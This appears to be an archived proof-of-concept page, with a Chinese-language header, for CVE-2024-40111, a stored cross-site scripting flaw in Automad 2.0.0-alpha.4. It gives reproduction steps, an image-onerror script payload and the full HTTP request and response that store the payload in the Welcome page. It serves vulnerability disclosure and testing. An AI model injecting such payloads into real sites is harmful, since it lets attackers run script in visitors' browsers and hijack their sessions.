关联漏洞
标题:
Automad 安全漏洞
(CVE-2024-40111)
描述:Automad是Marc Anton Dahmen个人开发者的一个平面文件内容管理系统和模板引擎。 Automad 2.0.0-alpha.4版本存在安全漏洞,该漏洞源于存在存储型跨站脚本(XSS)漏洞,攻击者能够将恶意JavaScript代码注入模板主体。
描述
Exploit For: CVE-2024-40111: Stored Cross-Site Scripting (XSS) in Automad 2.0.0-alpha.4
介绍
# CVE-2024-40111: Stored Cross-Site Scripting (XSS) in Automad 2.0.0-alpha.4
## Exploit Details
- **Exploit Title**: Stored Cross-Site Scripting (XSS) in Automad 2.0.0-alpha.4
- **Date**: 2024-06-20
- **Exploit Author**: Jerry Thomas (w3bn00b3r)
- **Vendor Homepage**: [Automad](https://automad.org)
- **Software Link**: [Automad GitHub Repository](https://github.com/marcantondahmen/automad)
- **Category**: Web Application [Flat File CMS]
- **Version**: 2.0.0-alpha.4
- **Tested on**: Docker version 26.1.4, Debian GNU/Linux 11 (bullseye)
## Description
A persistent (stored) cross-site scripting (XSS) vulnerability has been identified in Automad 2.0.0-alpha.4. This vulnerability allows attackers to inject malicious JavaScript code into the template body, which is stored within the CMS. The injected code is executed in the browser of any user visiting the affected page, potentially leading to session hijacking, data theft, and other malicious activities.
## Proof-of-Concept
### Steps to Reproduce
1. **Login**: Log in as an Admin and navigate to the endpoint `http://localhost/dashboard/home`.
2. **Edit Welcome Page**: Edit the default Welcome page.
3. **Navigate to Content Tab**: Go to `http://localhost/dashboard/page?url=%2F§ion=text` and edit the block named ***`Main`***.
4. **Inject Payload**: Enter the following XSS payload:
```html
<img src=x onerror=alert(1)>
```
### Request
```http
POST /_api/page/data HTTP/1.1
Host: localhost
Content-Length: 1822
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzHmXQBdtZsTYQYCv
Accept: */*
Origin: http://localhost
Referer: http://localhost/dashboard/page?url=%2F§ion=text
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: Automad-8c069df52082beee3c95ca17836fb8e2=d6ef49301b4eb159fbcb392e5137f6cb
Connection: close
------WebKitFormBoundaryzHmXQBdtZsTYQYCv
Content-Disposition: form-data; name="__csrf__"
49d68bc08cca715368404d03c6f45257b3c0514c7cdf695b3e23b0a4476a4ac1
------WebKitFormBoundaryzHmXQBdtZsTYQYCv
Content-Disposition: form-data; name="__json__"
{"data":{"title":"Welcome","+hero":{"blocks":[{"id":"KodzL-KvSZcRyOjlQDYW9Md2rGNtOUph","type":"paragraph","data":{"text":"Testing for xss","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"bO_fxLKL1LLlgtKCSV_wp2sJQkXAsda8","type":"paragraph","data":{"text":"<h1>XSS identified by Jerry</h1>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"},"+main":{"blocks":[{"id":"lD9sUJki6gn463oRwjcY_ICq5oQPYZVP","type":"paragraph","data":{"text":"You have successfully installed Automad 2.<br><br><img src=x onerror=alert(1)><br>","large":false},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}},{"id":"NR_n3XqFF94kfN0jka5XGbi_-TBEf9ot","type":"buttons","data":{"primaryText":"Visit Dashboard","primaryLink":"/dashboard","primaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingVertical":"0.5rem","paddingHorizontal":"1.5rem"},"primaryOpenInNewTab":false,"secondaryText":"","secondaryLink":"","secondaryStyle":{"borderWidth":"2px","borderRadius":"0.5rem","paddingHorizontal":"1.5rem","paddingVertical":"0.5rem"},"secondaryOpenInNewTab":true,"justify":"start","gap":"1rem"},"tunes":{"layout":null,"spacing":{"top":"","right":"","bottom":"","left":""},"className":"","id":""}}],"automadVersion":"2.0.0-alpha.4"}},"theme_template":"project","dataFetchTime":"1718911139","url":"/"}
------WebKitFormBoundaryzHmXQBdtZsTYQYCv--
```
### Response
```http
HTTP/1.1 200 OK
Server: nginx/1.24.0
Date: Thu, 20 Jun 2024 19:17:35 GMT
Content-Type: application/json; charset=utf-8
Connection: close
X-Powered-By: PHP/8.3.6
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 30
{"code":200,"time":1718911055}
```
5. **Trigger XSS**: The XSS payload triggers when visiting the homepage `http://localhost/`.
---

文件快照
[4.0K] /data/pocs/290ec07f5a995786ef54504ef8c18ae9d9dc9664
└── [4.2K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。